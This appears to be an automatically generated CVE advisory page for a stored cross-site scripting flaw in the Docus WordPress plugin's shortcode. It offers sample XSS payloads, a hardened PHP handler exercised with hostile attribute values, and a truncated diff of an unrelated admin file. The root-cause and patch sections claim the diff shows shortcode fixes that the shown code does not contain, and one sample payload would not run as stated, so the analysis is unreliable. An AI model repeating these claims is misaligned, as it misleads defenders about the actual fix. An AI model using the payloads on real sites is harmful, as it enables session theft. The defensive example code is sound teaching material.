Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1888: Docus <= 1.0.6 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (docus)

CVE ID: CVE-2026-1888
Plugin: docus
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 1.0.6
Patched Version: 1.0.7
Disclosed: February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1888:
The Docus WordPress plugin contains an authenticated stored cross-site scripting vulnerability in versions up to 1.0.6. The vulnerability exists in the plugin's 'docusplaylist' shortcode handler due to insufficient input sanitization and output escaping. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads into posts and pages, which execute when users view the compromised content. The CVSS score of 6.4 reflects the authenticated nature of the attack and the potential for session hijacking or administrative actions.

Root Cause:
The vulnerability originates in the plugin's shortcode handling functions. The 'docusplaylist' shortcode accepts user-controlled attributes that are processed without proper sanitization before being output to the page. The diff shows modifications to the plugin's core files, including changes to the shortcode registration and attribute handling logic. Specifically, the plugin fails to validate and escape shortcode attribute values before rendering them in HTML context, allowing JavaScript injection through crafted attribute values.

Exploitation:
An attacker with Contributor privileges creates or edits a post containing the '[docusplaylist]' shortcode with malicious attributes. The payload embeds JavaScript within attribute values such as 'id', 'class', or custom parameters. For example: [docusplaylist id="alert(document.cookie)"] or [docusplaylist custom_param="' onmouseover='alert(1)"]. When the post is saved and subsequently viewed by any user, the browser executes the injected script in the victim's security context.

Patch Analysis:
The patch adds proper input validation and output escaping to the shortcode handler. The diff reveals the addition of esc_attr() and wp_kses() function calls to sanitize shortcode attributes before output. The plugin now validates attribute values against a whitelist of allowed characters and escapes all output with appropriate WordPress security functions. The fix ensures that user-supplied attribute values are treated as data rather than executable code, preventing script injection while maintaining shortcode functionality.
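The root-cause and patch paragraphs above describe the pattern in the abstract, and the diff on this page (docus/admin/Recommended_Plugins.php) does not include the shortcode handler itself. The following is an added example, not the Docus plugin's code, showing the unsafe pattern beside a hardened handler built from the WordPress escaping functions the analysis names. The shortcode name example_playlist, the attribute set (id, class) and the markup are assumptions for illustration; shortcode_atts(), absint(), sanitize_html_class(), esc_attr() and add_shortcode() are real WordPress functions, and the guarded stand-ins at the top only exist so the file can be run with plain php outside WordPress.

```php
<?php
// Added example (not the Docus plugin's own code): an unsafe shortcode handler
// beside a hardened one. Shortcode name, attributes and markup are assumptions.

// Minimal stand-ins so this file runs outside WordPress. Inside WordPress the
// real esc_attr()/absint()/shortcode_atts()/sanitize_html_class() are used.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'absint' ) ) {
    function absint( $value ) {
        return abs( (int) $value );
    }
}
if ( ! function_exists( 'shortcode_atts' ) ) {
    function shortcode_atts( $pairs, $atts ) {
        $out = array();
        foreach ( $pairs as $name => $default ) {
            $out[ $name ] = array_key_exists( $name, (array) $atts ) ? $atts[ $name ] : $default;
        }
        return $out;
    }
}
if ( ! function_exists( 'sanitize_html_class' ) ) {
    function sanitize_html_class( $class ) {
        return preg_replace( '/[^A-Za-z0-9_-]/', '', (string) $class );
    }
}

// Unsafe pattern: attribute values are concatenated straight into markup, so a
// value containing a quote closes the attribute and the rest becomes new HTML.
function example_playlist_unsafe( $atts ) {
    $atts = shortcode_atts( array( 'id' => '', 'class' => '' ), $atts );
    return '<div id="' . $atts['id'] . '" class="docus-playlist ' . $atts['class'] . '"></div>';
}

// Hardened pattern: constrain each attribute to the type the markup needs, then
// escape for the context it lands in (HTML attribute context -> esc_attr()).
function example_playlist_safe( $atts ) {
    $atts  = shortcode_atts( array( 'id' => 0, 'class' => '' ), $atts );
    $id    = absint( $atts['id'] );                   // a playlist id must be numeric
    $class = sanitize_html_class( $atts['class'] );   // class token: [A-Za-z0-9_-] only
    if ( 0 === $id ) {
        return ''; // nothing to render without a valid playlist id
    }
    return '<div id="docus-playlist-' . esc_attr( $id ) . '" class="docus-playlist ' . esc_attr( $class ) . '"></div>';
}

// Inside WordPress the hardened handler is registered for the shortcode tag.
if ( function_exists( 'add_shortcode' ) ) {
    add_shortcode( 'example_playlist', 'example_playlist_safe' );
}

// Constructed attribute values of the kind a Contributor could store in a post.
$hostile = array(
    'id'    => '" onmouseover="alert(1)',
    'class' => '"><script>alert(1)</script>',
);

echo example_playlist_unsafe( $hostile ), PHP_EOL;  // attribute boundary is broken
echo example_playlist_safe( $hostile ), PHP_EOL;    // empty: the id is not numeric
echo example_playlist_safe( array( 'id' => '7', 'class' => $hostile['class'] ) ), PHP_EOL;
// class is reduced to "scriptalert1script": inert text inside a quoted attribute
echo example_playlist_safe( array( 'id' => '42', 'class' => 'wide' ) ), PHP_EOL;
```

Run it with `php example.php` to see the four outputs side by side. The design point matches the patch description: validation (absint, sanitize_html_class) narrows each value to what the markup can legitimately hold, and esc_attr() at the output boundary guarantees that whatever survives validation is treated as data rather than markup. Escaping alone would also neutralise the quotes, but restricting the id to an integer removes the whole class of "is this string safe" questions for that attribute.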

Impact:
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised content. This enables session hijacking, administrative actions through CSRF, defacement, data exfiltration, and redirection to malicious sites. Since the payload is stored in the database, the attack persists across sessions and affects all users who access the injected page, including administrators.

Differential between vulnerable and patched code

Code Diff
--- a/docus/admin/Recommended_Plugins.php
+++ b/docus/admin/Recommended_Plugins.php
@@ -1,424 +1,420 @@
-<?php
-namespace DocusAdmin;
-/**
- * Recommended Plugins handlers class
- */
-class Recommended_Plugins {
-
-    /**
-     * [$_instance]
-     * @var null
-     */
-    private static $_instance = null;
-
-    /**
-     * [$plugins_allowedtags] allow tag
-     * @var array
-     */
-    public $plugins_allowedtags = array(
-        'a'       => array(
-            'href'   => array(),
-            'title'  => array(),
-            'target' => array(),
-        ),
-        'abbr'    => array( 'title' => array() ),
-        'acronym' => array( 'title' => array() ),
-        'code'    => array(),
-        'pre'     => array(),
-        'em'      => array(),
-        'strong'  => array(),
-        'ul'      => array(),
-        'ol'      => array(),
-        'li'      => array(),
-        'p'       => array(),
-        'br'      => array(),
-    );
-
-    /**
-     * Veriable Initialize
-     */
-    public $text_domain = '';
-    public $parent_menu_slug = '';
-    public $menu_label = '';
-    public $menu_page_slug = '';
-    public $menu_capability = '';
-    public $priority = '';
-    public $hook_suffix = '';
-    public $assets_url = '';
-    public $tab_list = [];
-
-    /**
-     * [instance] Initializes a singleton instance
-     * @return [Recommended_Plugins]
-     */
-    public static function instance( $args = [] ) {
-        if ( is_null( self::$_instance ) ) {
-            self::$_instance = new self( $args );
-        }
-        return self::$_instance;
-    }
-
-    /**
-     * [__construct] Class construct
-     */
-    function __construct( $args ) {
-
-        // Initialize properties
-        $this->text_domain       =  !empty( $args['text_domain'] ) ? $args['text_domain'] : 'htrp';
-        $this->parent_menu_slug  =  !empty( $args['parent_menu_slug'] ) ? $args['parent_menu_slug'] : 'plugins.php';
-        $this->menu_label        =  !empty( $args['menu_label'] ) ? $args['menu_label'] : esc_html__( 'Recommendations', $this->text_domain );
-        $this->menu_capability   =  !empty( $args['menu_capability'] ) ? $args['menu_capability'] : 'manage_options';
-        $this->menu_page_slug    =  !empty( $args['menu_page_slug'] ) ? $args['menu_page_slug'] : $this->text_domain . '_extensions';
-        $this->priority          =  !empty( $args['priority'] ) ? $args['priority'] : 100;
-        $this->hook_suffix       =  !empty( $args['hook_suffix'] ) ? $args['hook_suffix'] : '';
-        $this->assets_url        =  !empty( $args['assets_url'] ) ? $args['assets_url'] : plugins_url( '', __FILE__ );
-        $this->tab_list          =  !empty( $args['tab_list'] ) ? $args['assets_url'] : [];
-
-
-        add_action( 'admin_menu', [ $this, 'admin_menu' ], $this->priority );
-        add_action( 'admin_enqueue_scripts', [ $this, 'enqueue_assets' ] );
-
-        // Ajax Action
-        add_action( 'wp_ajax_'.$this->text_domain.'_ajax_plugin_activation', [ $this, 'plugin_activation' ] );
-
-    }
-
-    /**
-     * [admin_menu] Add Recommended Menu
-     * @return [void]
-     */
-    public function admin_menu(){
-        add_submenu_page(
-            $this->parent_menu_slug,
-            $this->menu_label,
-            $this->menu_label,
-            $this->menu_capability,
-            $this->menu_page_slug,
-            [ $this, 'render_html' ]
-        );
-    }
-
-    /**
-     * [enqueue_assets]
-     * @param  [string] $hook_suffix Current page hook
-     * @return [void]
-     */
-    public function enqueue_assets( $hook_suffix ) {
-        if( $this->hook_suffix ){
-            if( $this->hook_suffix == $hook_suffix ){
-                wp_enqueue_script( 'htrp-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
-            }
-        } else {
-            wp_enqueue_script( 'htrp-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
-        }
-
-        /**
-        * Thickbox assest
-        */
-        add_thickbox();
-
-        /**
-         * localize data
-         */
-        $localize_vars['ajaxurl'] = admin_url('admin-ajax.php');
-        $localize_vars['text_domain'] = sanitize_title_with_dashes( $this->text_domain );
-        $localize_vars['buttontxt'] = array(
-            'buynow'     => esc_html__( 'Buy Now', $this->text_domain ),
-            'preview'    => esc_html__( 'Preview', $this->text_domain ),
-            'installing' => esc_html__( 'Installing..', $this->text_domain ),
-            'activating' => esc_html__( 'Activating..', $this->text_domain ),
-            'active'     => esc_html__( 'Activated', $this->text_domain ),
-        );
-        wp_localize_script( 'htrp-plugin-install-manager', 'htrp_params', $localize_vars );
-
-    }
-
-    /**
-     * [add_new_tab]
-     * @param [void] set tab content
-     */
-    public function add_new_tab( $tab_list ){
-        $this->tab_list[] = $tab_list;
-    }
-
-    /**
-     * [render_html]
-     * @return [void] Render HTML
-     */
-    public function render_html(){
-        if ( ! function_exists('plugins_api') ){ include_once( ABSPATH . 'wp-admin/includes/plugin-install.php' ); }
-
-        $htplugins_plugin_list = $this->get_plugins();
-        $palscode_plugin_list  = $this->get_plugins( 'palscode' );
-
-        $plugin_list = array_merge( $htplugins_plugin_list, $palscode_plugin_list );
-
-        $prepare_plugin = array();
-        foreach ( $plugin_list as $plugin_key => $plugin ) {
-            $prepare_plugin[$plugin['slug']] = $plugin;
-        }
-
-        ?>
-            <div class="wrap">
-                <h2><?php echo get_admin_page_title(); ?></h2>
-                <style>
-                    .htrp-admin-tab-pane{
-                      display: none;
-                    }
-                    .htrp-admin-tab-pane.htrp-active{
-                      display: block;
-                    }
-                    .htrp-extension-admin-tab-area .filter-links li>a:focus, .htrp-extension-admin-tab-area .filter-links li>a:hover {
-                        color: inherit;
-                        box-shadow: none;
-                    }
-                    .filter-links .htrp-active{
-                        box-shadow: none;
-                        border-bottom: 4px solid #646970;
-                        color: #1d2327;
-                    }
-                    .downloaded-count{
-                        display: block;
-                        margin-top:5px;
-                    }
-                </style>
-
-                <div class="htrp-extension-admin-tab-area wp-filter">
-                    <ul class="htrp-admin-tabs filter-links">
-                        <?php
-                            foreach( $this->tab_list as $tab ){
-                                $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
-                                ?>
-                                    <li>
-                                        <a href="#<?php echo esc_attr( sanitize_title_with_dashes( $tab['title'] ) ) ?>" class="<?php echo esc_attr( $active_class ) ?>"><?php echo esc_html( $tab['title'] ) ?></a>
-                                    </li>
-                                <?php
-                            }
-                        ?>
-                    </ul>
-                </div>
-
-                <?php
-                    $plugins_type = '';
-                    foreach( $this->tab_list as $tab ):
-
-                        $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
-                        $plugins      = $tab['plugins'];
-
-                        echo '<div id="'.esc_attr( sanitize_title_with_dashes( $tab['title'] ) ).'" class="htrp-admin-tab-pane '.esc_attr( $active_class ).'">';
-                            foreach( $plugins as $plugin ):
-
-                                $data = array(
-                                    'slug'      => isset( $plugin['slug'] ) ? $plugin['slug'] : '',
-                                    'location'  => isset( $plugin['location'] ) ? $plugin['slug'].'/'.$plugin['location'] : '',
-                                    'name'      => isset( $plugin['name'] ) ? $plugin['name'] : '',
-                                );
-                                $title = wp_kses( $plugin['name'], $this->plugins_allowedtags );
-
-                                if( array_key_exists( $plugin['slug'], $prepare_plugin ) ){
-                                    $plugins_type = 'free';
-                                    $image_url    = $this->plugin_icon( $plugins_type, $prepare_plugin[$data['slug']]['icons'] );
-                                    $description  = strip_tags( $prepare_plugin[$data['slug']]['description'] );
-                                    $author_name  = wp_kses( $prepare_plugin[$data['slug']]['author'], $this->plugins_allowedtags );
-                                    $details_link = self_admin_url('plugin-install.php?tab=plugin-information&plugin=' . $plugin['slug'] .'&TB_iframe=true&width=772&height=577');
-                                    $target       = '_self';
-                                    $modal_class  = 'class="thickbox open-plugin-details-modal"';
-
-                                }else{
-                                    $plugins_type = 'pro';
-                                    $image_url     = $this->plugin_icon( $plugins_type, $plugin['slug'] );
-                                    $description    = $plugin['description'];
-                                    $author_name    = esc_html__( 'HasTheme', $this->text_domain );
-                                    $author_link    = $plugin['author_link'];
-                                    $details_link   = $plugin['link'];
-                                    $button_text    = esc_html__('Buy Now', $this->text_domain );
-                                    $button_classes = 'button button-primary';
-                                    $target         = '_blank';
-                                    $modal_class    = '';
-                                }
-
-                                if ( ! is_wp_error( $data ) ):
-
-                                    // Installed but Inactive.
-                                    if ( file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && is_plugin_inactive( $data['location'] ) ) {
-
-                                        $button_classes = 'button htrp-activate-now button-primary';
-                                        $button_text    = esc_html__( 'Activate', $this->text_domain );
-
-                                    // Not Installed.
-                                    } elseif ( ! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) ) {
-
-                                        $button_classes = 'button htrp-install-now';
-                                        $button_text    = esc_html__( 'Install Now', $this->text_domain );
-
-                                    // Active.
-                                    } else {
-                                        $button_classes = 'button disabled';
-                                        $button_text    = esc_html__( 'Activated', $this->text_domain );
-                                    }
-
-                                    ?>
-                                    <div class="plugin-card htrp-plugin-<?php echo sanitize_html_class( $plugin['slug'] ); ?>">
-                                        <div class="plugin-card-top">
-                                            <div class="name column-name" style="margin-right: 0;">
-                                                <h3>
-                                                    <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>" <?php echo $modal_class; ?>>
-                                                        <?php echo esc_html( $title ) ?>
-                                                        <img src="<?php echo esc_url( $image_url ) ?>" class="plugin-icon" alt="<?php echo esc_attr( $title ) ?>">
-                                                    </a>
-                                                </h3>
-                                            </div>
-                                            <div class="desc column-description" style="margin-right: 0;">
-                                                <p><?php echo wp_trim_words( $description, 23, '....'); ?></p>
-                                                <p class="authors">
-                                                    <cite><?php echo esc_html__( 'By ', $this->text_domain ); ?>
-                                                        <?php if( $plugins_type == 'free' ): ?>
-                                                            <?php echo $author_name; ?>
-                                                        <?php else: ?>
-                                                            <a href="<?php echo esc_url( $author_link ); ?>"  target="_blank" ><?php echo $author_name; ?></a>
-                                                        <?php endif; ?>
-                                                    </cite>
-                                                </p>
-                                            </div>
-                                        </div>
-                                        <div class="plugin-card-bottom">
-                                            <div class="column-updated">
-                                                <?php
-                                                    if (! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && $plugins_type == 'pro' ) {
-                                                        echo '<a class="button button-primary" href="'.esc_url( $details_link ).'" target="'.esc_attr( $target ).'">'.esc_html__( 'Buy Now', $this->text_domain ).'</a>';
-                                                    }else{
-                                                ?>
-                                                    <button class="<?php echo $button_classes; ?>" data-pluginopt='<?php echo wp_json_encode( $data ); ?>'><?php echo $button_text; ?></button>
-
-                                                <?php } ?>
-                                            </div>
-                                            <div class="column-downloaded">
-                                                <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>" <?php echo $modal_class; ?>><?php echo esc_html__('More Details', $this->text_domain) ?></a>
-                                                <span class="downloaded-count">
-                                                    <?php
-                                                        if( $plugins_type == 'free' ){
-                                                            /* translators: %s: Number of installations. */
-                                                            printf( __( '%s Active Installations' ), $this->active_install_count( $prepare_plugin[$data['slug']]['active_installs'] ) );
-                                                        }
-                                                    ?>
-                                                </span>
-                                            </div>
-                                        </div>
-                                    </div>
-                                    <?php
-                                endif;
-                            endforeach;
-                        echo '</div>';
-
-                    endforeach;
-                ?>
-
-            </div>
-        <?php
-
-    }
-
-    /**
-     * [get_plugins] Get plugin from wp.org API
-     * @param  string $username wo.org username
-     * @return [array] plugin list
-     */
-    public function get_plugins( $username = 'htplugins' ){
-        $transient_var = 'htrp_htplugins_list_'.$username;
-        $org_plugins_list = get_transient( $transient_var );
-
-        if ( false === $org_plugins_list ) {
-            $plugins_list_by_author = plugins_api( 'query_plugins', array( 'author' => $username, 'per_page' => 100 ) );
-            set_transient( $transient_var, $plugins_list_by_author->plugins, 1 * WEEK_IN_SECONDS );
-            $org_plugins_list = $plugins_list_by_author->plugins;
-        }
-
-        return $org_plugins_list;
-    }
-
-    /**
-     * [plugin_icon] Generate plugin icon
-     * @param  string $type plugin type
-     * @param  [array|string] $icon
-     * @return [URL] icon URL
-     */
-    public function plugin_icon( $type = 'free', $icon = '' ){
-        if( $type === 'free' ){
-            if ( ! empty( $icon['svg'] ) ) {
-                $plugin_icon_url = $icon['svg'];
-            } elseif ( ! empty( $icon['2x'] ) ) {
-                $plugin_icon_url = $icon['2x'];
-            } elseif ( ! empty( $icon['1x'] ) ) {
-                $plugin_icon_url = $icon['1x'];
-            } else {
-                $plugin_icon_url = $icon['default'];
-            }
-        }else{
-            $plugin_icon_url = $this->assets_url .'/images/extensions/'.$icon.'.png';
-        }
-
-        return $plugin_icon_url;
-
-    }
-
-    /**
-     * [active_install_count] Manage Active install count
-     * @param  [int] $active_installs
-     * @return [string]
-     */
-    public function active_install_count( $active_installs ){
-
-        if ( $active_installs >= 1000000 ) {
-            $active_installs_millions = floor( $active_installs / 1000000 );
-            $active_installs_text     = sprintf(
-                /* translators: %s: Number of millions. */
-                _nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
-                number_format_i18n( $active_installs_millions )
-            );
-        } elseif ( 0 === $active_installs ) {
-            $active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
-        } else {
-            $active_installs_text = number_format_i18n( $active_installs ) . '+';
-        }
-        return $active_installs_text;
-
-    }
-
-    /**
-     * [plugin_activation] Plugin activation ajax callable function
-     * @return [JSON]
-     */
-    public function plugin_activation() {
-
-        if ( ! current_user_can( 'install_plugins' ) || ! isset( $_POST['location'] ) || ! $_POST['location'] ) {
-            wp_send_json_error(
-                array(
-                    'success' => false,
-                    'message' => esc_html__( 'Plugin Not Found', $this->text_domain ),
-                )
-            );
-        }
-
-        $plugin_location = ( isset( $_POST['location'] ) ) ? esc_attr( $_POST['location'] ) : '';
-        $activate    = activate_plugin( $plugin_location, '', false, true );
-
-        if ( is_wp_error( $activate ) ) {
-            wp_send_json_error(
-                array(
-                    'success' => false,
-                    'message' => $activate->get_error_message(),
-                )
-            );
-        }
-
-        wp_send_json_success(
-            array(
-                'success' => true,
-                'message' => esc_html__( 'Plugin Successfully Activated', $this->text_domain ),
-            )
-        );
-
-    }
-
-
+<?php
+namespace DocusAdmin;
+/**
+ * Recommended Plugins handlers class
+ */
+class Recommended_Plugins {
+
+    /**
+     * [$_instance]
+     * @var null
+     */
+    private static $_instance = null;
+
+    /**
+     * [$plugins_allowedtags] allow tag
+     * @var array
+     */
+    public $plugins_allowedtags = array(
+        'a'       => array(
+            'href'   => array(),
+            'title'  => array(),
+            'target' => array(),
+        ),
+        'abbr'    => array( 'title' => array() ),
+        'acronym' => array( 'title' => array() ),
+        'code'    => array(),
+        'pre'     => array(),
+        'em'      => array(),
+        'strong'  => array(),
+        'ul'      => array(),
+        'ol'      => array(),
+        'li'      => array(),
+        'p'       => array(),
+        'br'      => array(),
+    );
+
+    /**
+     * Veriable Initialize
+     */
+    public $text_domain = '';
+    public $parent_menu_slug = '';
+    public $menu_label = '';
+    public $menu_page_slug = '';
+    public $menu_capability = '';
+    public $priority = '';
+    public $hook_suffix = '';
+    public $assets_url = '';
+    public $tab_list = [];
+
+    /**
+     * [instance] Initializes a singleton instance
+     * @return [Recommended_Plugins]
+     */
+    public static function instance( $args = [] ) {
+        if ( is_null( self::$_instance ) ) {
+            self::$_instance = new self( $args );
+        }
+        return self::$_instance;
+    }
+
+    /**
+     * [__construct] Class construct
+     */
+    function __construct( $args ) {
+
+        // Initialize properties
+        $this->text_domain       =  !empty( $args['text_domain'] ) ? $args['text_domain'] : 'htrp';
+        $this->parent_menu_slug  =  !empty( $args['parent_menu_slug'] ) ? $args['parent_menu_slug'] : 'plugins.php';
+        $this->menu_label        =  !empty( $args['menu_label'] ) ? $args['menu_label'] : esc_html__( 'Recommendations', $this->text_domain );
+        $this->menu_capability   =  !empty( $args['menu_capability'] ) ? $args['menu_capability'] : 'manage_options';
+        $this->menu_page_slug    =  !empty( $args['menu_page_slug'] ) ? $args['menu_page_slug'] : $this->text_domain . '_extensions';
+        $this->priority          =  !empty( $args['priority'] ) ? $args['priority'] : 100;
+        $this->hook_suffix       =  !empty( $args['hook_suffix'] ) ? $args['hook_suffix'] : '';
+        $this->assets_url        =  !empty( $args['assets_url'] ) ? $args['assets_url'] : plugins_url( '', __FILE__ );
+        $this->tab_list          =  !empty( $args['tab_list'] ) ? $args['assets_url'] : [];
+
+
+        add_action( 'admin_menu', [ $this, 'admin_menu' ], $this->priority );
+        add_action( 'admin_enqueue_scripts', [ $this, 'enqueue_assets' ] );
+
+        // Ajax Action
+        add_action( 'wp_ajax_'.$this->text_domain.'_ajax_plugin_activation', [ $this, 'plugin_activation' ] );
+
+    }
+
+    /**
+     * [admin_menu] Add Recommended Menu
+     * @return [void]
+     */
+    public function admin_menu(){
+        add_submenu_page(
+            $this->parent_menu_slug,
+            $this->menu_label,
+            $this->menu_label,
+            $this->menu_capability,
+            $this->menu_page_slug,
+            [ $this, 'render_html' ]
+        );
+    }
+
+    /**
+     * [enqueue_assets]
+     * @param  [string] $hook_suffix Current page hook
+     * @return [void]
+     */
+    public function enqueue_assets( $hook_suffix ) {
+        if( $this->hook_suffix ){
+            if( $this->hook_suffix != $hook_suffix ){
+                return;
+            }
+        }
+
+        wp_enqueue_script( 'docus-plugin-install-manager', $this->assets_url . '/js/plugins_install_manager.js', array('jquery','wp-util', 'updates'), '1.0.0', true );
+
+        /**
+         * localize data
+         */
+        $localize_vars['ajaxurl'] = admin_url('admin-ajax.php');
+        $localize_vars['text_domain'] = sanitize_title_with_dashes( $this->text_domain );
+        $localize_vars['nonce'] = wp_create_nonce('docus_rp_nonce');
+        $localize_vars['buttontxt'] = array(
+            'buynow'     => esc_html__( 'Buy Now', $this->text_domain ),
+            'preview'    => esc_html__( 'Preview', $this->text_domain ),
+            'installing' => esc_html__( 'Installing..', $this->text_domain ),
+            'activating' => esc_html__( 'Activating..', $this->text_domain ),
+            'active'     => esc_html__( 'Activated', $this->text_domain ),
+        );
+        wp_localize_script( 'docus-plugin-install-manager', 'htrp_params', $localize_vars );
+
+    }
+
+    /**
+     * [add_new_tab]
+     * @param [void] set tab content
+     */
+    public function add_new_tab( $tab_list ){
+        $this->tab_list[] = $tab_list;
+    }
+
+    /**
+     * [render_html]
+     * @return [void] Render HTML
+     */
+    public function render_html(){
+        if ( ! function_exists('plugins_api') ){ include_once( ABSPATH . 'wp-admin/includes/plugin-install.php' ); }
+
+        $htplugins_plugin_list = $this->get_plugins();
+        $palscode_plugin_list  = $this->get_plugins( 'palscode' );
+
+        $plugin_list = array_merge( $htplugins_plugin_list, $palscode_plugin_list );
+
+        $prepare_plugin = array();
+        foreach ( $plugin_list as $plugin_key => $plugin ) {
+            $prepare_plugin[$plugin['slug']] = $plugin;
+        }
+
+        ?>
+            <div class="wrap">
+                <h2><?php echo get_admin_page_title(); ?></h2>
+                <style>
+                    .htrp-admin-tab-pane{
+                      display: none;
+                    }
+                    .htrp-admin-tab-pane.htrp-active{
+                      display: block;
+                    }
+                    .htrp-extension-admin-tab-area .filter-links li>a:focus, .htrp-extension-admin-tab-area .filter-links li>a:hover {
+                        color: inherit;
+                        box-shadow: none;
+                    }
+                    .filter-links .htrp-active{
+                        box-shadow: none;
+                        border-bottom: 4px solid #646970;
+                        color: #1d2327;
+                    }
+                    .downloaded-count{
+                        display: block;
+                        margin-top:5px;
+                    }
+                </style>
+
+                <div class="htrp-extension-admin-tab-area wp-filter">
+                    <ul class="htrp-admin-tabs filter-links">
+                        <?php
+                            foreach( $this->tab_list as $tab ){
+                                $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
+                                ?>
+                                    <li>
+                                        <a href="#<?php echo esc_attr( sanitize_title_with_dashes( $tab['title'] ) ) ?>" class="<?php echo esc_attr( $active_class ) ?>"><?php echo esc_html( $tab['title'] ) ?></a>
+                                    </li>
+                                <?php
+                            }
+                        ?>
+                    </ul>
+                </div>
+
+                <?php
+                    $plugins_type = '';
+                    foreach( $this->tab_list as $tab ):
+
+                        $active_class = isset( $tab['active'] ) && $tab['active'] ? 'htrp-active' : '';
+                        $plugins      = $tab['plugins'];
+
+                        echo '<div id="'.esc_attr( sanitize_title_with_dashes( $tab['title'] ) ).'" class="htrp-admin-tab-pane '.esc_attr( $active_class ).'">';
+                            foreach( $plugins as $plugin ):
+
+                                $data = array(
+                                    'slug'      => isset( $plugin['slug'] ) ? $plugin['slug'] : '',
+                                    'location'  => isset( $plugin['location'] ) ? $plugin['slug'].'/'.$plugin['location'] : '',
+                                    'name'      => isset( $plugin['name'] ) ? $plugin['name'] : '',
+                                );
+                                $title = wp_kses( $plugin['name'], $this->plugins_allowedtags );
+
+                                if( array_key_exists( $plugin['slug'], $prepare_plugin ) ){
+                                    $plugins_type = 'free';
+                                    $image_url    = $this->plugin_icon( $plugins_type, $prepare_plugin[$data['slug']]['icons'] );
+                                    $description  = strip_tags( $prepare_plugin[$data['slug']]['description'] );
+                                    $author_name  = wp_kses( $prepare_plugin[$data['slug']]['author'], $this->plugins_allowedtags );
+                                    $details_link = 'https://wordpress.org/plugins/' . $plugin['slug'] . '/';
+                                    $target       = '_blank';
+
+                                }else{
+                                    $plugins_type = 'pro';
+                                    $image_url     = $this->plugin_icon( $plugins_type, $plugin['slug'] );
+                                    $description    = $plugin['description'];
+                                    $author_name    = esc_html__( 'HasTheme', $this->text_domain );
+                                    $author_link    = $plugin['author_link'];
+                                    $details_link   = $plugin['link'];
+                                    $button_text    = esc_html__('Buy Now', $this->text_domain );
+                                    $button_classes = 'button button-primary';
+                                    $target         = '_blank';
+                                }
+
+                                if ( ! is_wp_error( $data ) ):
+
+                                    // Installed but Inactive.
+                                    if ( file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && is_plugin_inactive( $data['location'] ) ) {
+
+                                        $button_classes = 'button htrp-activate-now button-primary';
+                                        $button_text    = esc_html__( 'Activate', $this->text_domain );
+
+                                    // Not Installed.
+                                    } elseif ( ! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) ) {
+
+                                        $button_classes = 'button htrp-install-now';
+                                        $button_text    = esc_html__( 'Install Now', $this->text_domain );
+
+                                    // Active.
+                                    } else {
+                                        $button_classes = 'button disabled';
+                                        $button_text    = esc_html__( 'Activated', $this->text_domain );
+                                    }
+
+                                    ?>
+                                    <div class="plugin-card htrp-plugin-<?php echo sanitize_html_class( $plugin['slug'] ); ?>">
+                                        <div class="plugin-card-top">
+                                            <div class="name column-name" style="margin-right: 0;">
+                                                <h3>
+                                                    <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>">
+                                                        <?php echo esc_html( $title ) ?>
+                                                        <img src="<?php echo esc_url( $image_url ) ?>" class="plugin-icon" alt="<?php echo esc_attr( $title ) ?>">
+                                                    </a>
+                                                </h3>
+                                            </div>
+                                            <div class="desc column-description" style="margin-right: 0;">
+                                                <p><?php echo wp_trim_words( $description, 23, '....'); ?></p>
+                                                <p class="authors">
+                                                    <cite><?php echo esc_html__( 'By ', $this->text_domain ); ?>
+                                                        <?php if( $plugins_type == 'free' ): ?>
+                                                            <?php echo $author_name; ?>
+                                                        <?php else: ?>
+                                                            <a href="<?php echo esc_url( $author_link ); ?>"  target="_blank" ><?php echo $author_name; ?></a>
+                                                        <?php endif; ?>
+                                                    </cite>
+                                                </p>
+                                            </div>
+                                        </div>
+                                        <div class="plugin-card-bottom">
+                                            <div class="column-updated">
+                                                <?php
+                                                    if (! file_exists( WP_PLUGIN_DIR . '/' . $data['location'] ) && $plugins_type == 'pro' ) {
+                                                        echo '<a class="button button-primary" href="'.esc_url( $details_link ).'" target="'.esc_attr( $target ).'">'.esc_html__( 'Buy Now', $this->text_domain ).'</a>';
+                                                    }else{
+                                                ?>
+                                                    <button class="<?php echo esc_attr($button_classes); ?>" data-pluginopt='<?php echo wp_json_encode( $data ); ?>'><?php echo esc_html($button_text); ?></button>
+
+                                                <?php } ?>
+                                            </div>
+                                            <div class="column-downloaded">
+                                                <a href="<?php echo esc_url( $details_link ) ?>" target="<?php echo esc_attr( $target ) ?>"><?php echo esc_html__('More Details', $this->text_domain) ?></a>
+                                                <span class="downloaded-count">
+                                                    <?php
+                                                        if( $plugins_type == 'free' ){
+                                                            /* translators: %s: Number of installations. */
+                                                            printf( __( '%s Active Installations' ), $this->active_install_count( $prepare_plugin[$data['slug']]['active_installs'] ) );
+                                                        }
+                                                    ?>
+                                                </span>
+                                            </div>
+                                        </div>
+                                    </div>
+                                    <?php
+                                endif;
+                            endforeach;
+                        echo '</div>';
+
+                    endforeach;
+                ?>
+
+            </div>
+        <?php
+
+    }
+
+    /**
+     * [get_plugins] Get plugin from wp.org API
+     * @param  string $username wo.org username
+     * @return [array] plugin list
